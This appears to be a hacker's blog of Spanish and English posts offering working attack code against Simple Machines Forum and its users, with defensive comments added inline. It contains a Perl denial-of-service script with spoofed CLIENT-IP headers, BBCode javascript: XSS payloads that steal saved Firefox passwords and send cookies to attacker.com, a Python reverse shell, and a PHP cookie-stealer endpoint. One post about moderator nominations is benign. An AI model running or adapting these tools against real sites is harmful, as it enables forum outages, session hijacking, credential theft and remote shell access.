Posted on
8:47
by Xianur0
#!/usr/bin/perl
use IO::Socket;
# uxmal666@gmail.com
# By Xianur0
use HTTP::Request;
use LWP::UserAgent;
# Shared LWP client with a fixed Firefox 2.0 User-Agent string. In this
# listing it is used only by logear() for the login request.
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11");
print "\n\x09\x09\x09\x09\x09\x09\x09SMF Killer By Xianur0!\n\n";
# Positional arguments: host, forum path, account name, loop bound, account
# password. The usage text is printed (via die) when the password is missing.
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $numero = $ARGV[3];
my $password = $ARGV[4] || die("\nUso: smf.pl [host] [Path] [usuario] [Numeros Registros] [password]\n");
# $a.$e.$o.$i are the four octets of a synthetic address that is written into
# the CLIENT-IP request header below; the sequence starts at 189.0.0.133.
$o=0;
$e=0;
$a=189;
# Log in once; the returned Set-Cookie text is reused on every request.
$cookie = logear();
# Defensive reading: every request sent by this loop arrives from the same real
# peer address and carries the same session cookie; only the client-supplied
# CLIENT-IP header changes, and it increments sequentially. On the server side,
# CLIENT-IP / X-Forwarded-For style headers should be honoured only when a
# trusted proxy sets them, and per-session or per-peer rate limits should not
# depend on them. What the forum does with the header is not shown in this
# listing; the author's note after the script attributes the impact to SMF's
# SQL handling.
for($i=133;$i<=$numero;$i++) {
# Octet roll-over: carry from $i into $o, $e and $a; the script stops when the
# first octet reaches 255.
if($i>=255) {$i=0;$o++;}
if($o>=255) {$o=0;$e++;}
if($e>=255) {$e=0;$a++;}
if($a>=255) {die("No Mas IPs :)..");}
# A new TCP connection to port 80 is opened on each iteration (Timeout of 1).
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', Timeout=>'1', );
if(!$sock) {print "No se Pudo Conectar a $host!\n"; } else {
# Two HEAD requests are built back to back for the same connection, each with
# the next synthetic CLIENT-IP value and the session cookie.
$ip = $a.".".$e.".".$o.".".$i;
$paquete = "HEAD $path HTTP/1.1\r\nHost: $host\r\nCLIENT-IP: $ip\nCookie: ".$cookie."\n\n";
$i++;
$ip = $a.".".$e.".".$o.".".$i;
$paquete .= "HEAD $path HTTP/1.1\r\nHost: $host\r\nCLIENT-IP: $ip\nCookie: ".$cookie."\n\n";
# The requests are written to the socket; no response is read back.
print $sock $paquete;
print "\r\nEnviados $ip\r\n";
}}
# logear ("log in"): POSTs the account name and password to the forum's
# ?action=login2 endpoint and returns the concatenated Set-Cookie header text.
# Reads the file-level $host, $path, $user, $password and $ua, and appends to
# the file-level $cookie. Dies when no Set-Cookie text was collected.
sub logear() {
my $req = HTTP::Request->new(POST => "http://".$host."/".$path."?action=login2");
$req->content_type('application/x-www-form-urlencoded');
# The login request carries a fixed CLIENT-IP of 127.127.127.127. Log signal
# for defenders: a loopback-range value in a client-supplied address header on
# a request that arrived from a non-local peer.
$req->header("CLIENT-IP" => "127.127.127.127");
# NOTE(review): cookielength=-1 presumably selects the session length on the
# SMF side -- confirm against the forum's login handler.
$req->content("user=".$user."&passwrd=".$password."&cookielength=-1");
my $res = $ua->request($req);
# The response is flattened to text and scanned line by line; whatever follows
# "Set-Cookie:" on a line is appended to $cookie.
$response = $res->as_string;
@headers = split("\n",$response);
foreach $h (@headers) {
@hs = split("Set-Cookie:",$h);
$cookie .= $hs[1];
}
if($cookie eq "") {
die "\n[!] No se Puede Encontrar la cookie :S\n";
} else { print "[-] Cookie Detectada: ".$cookie."\n";}
return $cookie;
}
tira un foro SMF en menos de un minuto :)
usuario: el usuario que crearon en el foro
password: la password de dicho usuario
Numero de Registros: la cantidad de mensajes que se enviaran en total (este numero se multiplica por 2 y sera el numero de paquetes que el servidor leera por ejemplo si quiero que el servidor se caiga durante mas o menos 1 hora, coloco 5000)
¡Publicado! No hagan estupideces, que yo no me hago responsable de nada; simplemente les puse el ejemplo de la debilidad del SQL del SMF ante este tipo de situaciones...
Posted on
21:22
by Xianur0
Nominations are Open For Moderation on MITM Forum
Minimum Requirements:
* 15 Posts Content (no spam, no opinions, no content copy & paste)
* Knowledge of the area to moderate
* Time to Keep Your area orderly
More Information:
http://forum.mitm.cl/index.php?topic=874.0
Posted on
16:47
by Xianur0
Firefox & SMF Password Stealing By Xianur0
bbcode example:
[iurl=javascript:document.write(unescape('%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%22%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%61%63%61%6E%74%65%2E%63%6F%6D%2F%65%76%69%6C%70%6F%70%75%70%2E%68%74%6D%22%2C%22%45%76%69%6C%20%50%6F%70%75%70%22%2C%22%74%6F%6F%6C%62%61%72%3D%6E%6F%2C%20%6C%6F%63%61%74%69%6F%6E%3D%6E%6F%2C%20%64%69%72%65%63%74%6F%72%69%65%73%3D%6E%6F%2C%20%73%74%61%74%75%73%3D%6E%6F%2C%20%6D%65%6E%75%62%61%72%3D%6E%6F%2C%20%73%63%72%6F%6C%6C%62%61%72%73%3D%6E%6F%2C%20%72%65%73%69%7A%61%62%6C%65%3D%79%65%73%2C%20%77%69%64%74%68%3D%35%30%38%2C%20%68%65%69%67%68%74%3D%33%36%35%2C%20%74%6F%70%3D%38%35%2C%20%6C%65%66%74%3D%31%34%30%22%29%3B%3C%2F%73%63%72%69%70%74%3E')+"test");][img]http://.[/img]http://e-r00t.s0me.co.cc
evilpopup.htm example:
<script>
// Demonstration popup for the BBCode example above. It points the window that
// opened it at '?action=login', waits three seconds, then reads the user and
// passwrd fields of that window's frmLogin form and shows them in an alert box.
// NOTE(review): per the author's remark below, the fields are expected to hold
// credentials pre-filled by Firefox's saved-password feature; this listing
// alone does not show that, nor under which origin the popup runs.
// Defensive takeaway: the entry point is the forum rendering a javascript: URL
// taken from BBCode as a clickable link. Restricting [url]/[iurl] targets to an
// allow-list of schemes (http, https) on output removes it.
window.opener.location.href='?action=login';
function alertar() {alert("User: " + window.opener.document.frmLogin.user.value + "\nPassword: " + window.opener.document.frmLogin.passwrd.value + "\nHacked! jejeje");}setTimeout("alertar()", 3000);
</script>
uno mas basado en la misma ciencia y en la falla de seguridad de firefox con el manejo de passwords guardadas jejejeje :)...
Posted on
19:50
by Xianur0
#!/usr/bin/env python -u
# By Xianur0
# uxmal666@gmail.com
import sys, socket, os
# Python 2 listing (print statements, "except OSError, error"). Indentation was
# lost in this copy, so the nesting described in these comments is inferred
# from statement order.
# Defensive reading: the observable behaviour is an interpreter process that
# detaches with fork(), opens an outbound TCP connection to an address given on
# its command line, and then runs /bin/bash with stdin and stdout bound to that
# socket. Useful controls are egress filtering for hosts that have no reason to
# initiate outbound connections, and process monitoring for a shell whose
# standard descriptors are a network socket.
if len(sys.argv) != 3:
print "[x] Uso: %s [host] [port]" % (sys.argv[0])
else:
# Remote endpoint comes from the two command-line arguments.
host = str(sys.argv[1])
port = int(sys.argv[2])
handler = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
try:
# First fork: the parent exits immediately, the child carries on.
if os.fork() > 0: os._exit(0)
except OSError, error:
print 'Error En Fork: %d (%s)' % (error.errno, error.strerror)
# Second fork: a message is printed in the process that receives a child pid.
pid = os.fork()
if pid > 0:
print 'Fork No Valido!'
# Outbound connection to host:port.
handler.connect((host, port))
print "\n[x] Advance Reverse Shell By Xianur0.... OK\n"
# The socket descriptor is duplicated onto stdin and stdout.
os.dup2(handler.fileno(), sys.stdin.fileno())
os.dup2(handler.fileno(), sys.stdout.fileno())
handler.sendall(('\n<-------------------------Advance Reverse Shell By Xianur0-------------------->\n'))
# Each pass sends a prompt string and runs /bin/bash through os.system().
while handler.recv:
handler.sendall(('\n\nXianur0:~ '))
os.system('/bin/bash')
# Bare except: any exception raised above ends up as the same message.
except:
print "[!] Error conectando"
Posted on
12:48
by Xianur0
Author: Xianur0
SMF's BBCode parser does not properly filter the URLs specified in [url] tags: [center][size=14pt][url=javascript:alert('xss')]Saltando Filtro
:D...[/url][/size]
[url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://img508.imageshack.us/img508/6982/flmnetworkuserbar494abfyb2.png[/img][/center]
Clicking the image runs the JavaScript.
BBC Cookie Exploit:[center][size=14pt][url=][/url][/size]
[url=javascript:
document.write(unescape('%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%22%30%25%22%20%68%65%69%67%68%74%3D%22%30%25%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%74%61%63%6B%65%72%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%73%74%65%61%6C%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%20%2B%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%20%2B%20%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%25%22%3E'));][img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]
PHP Cookie Stealer:<?php
// Receiving end of the BBCode example above: takes the 'cookie' query-string
// parameter exactly as sent and appends it, one value per line, to cookies.txt
// (a relative path).
// Defensive takeaway: marking the forum's session cookie HttpOnly keeps it out
// of document.cookie, and rejecting javascript: URLs in BBCode link targets
// removes the injection point. In proxy or egress logs the trace is a request
// to an external host whose query string carries the forum's cookie names.
$cookie = $_GET['cookie'];
// Append mode ('a'): earlier entries are kept.
$handler = fopen('cookies.txt', 'a');
fwrite($handler, $cookie."\n");
?>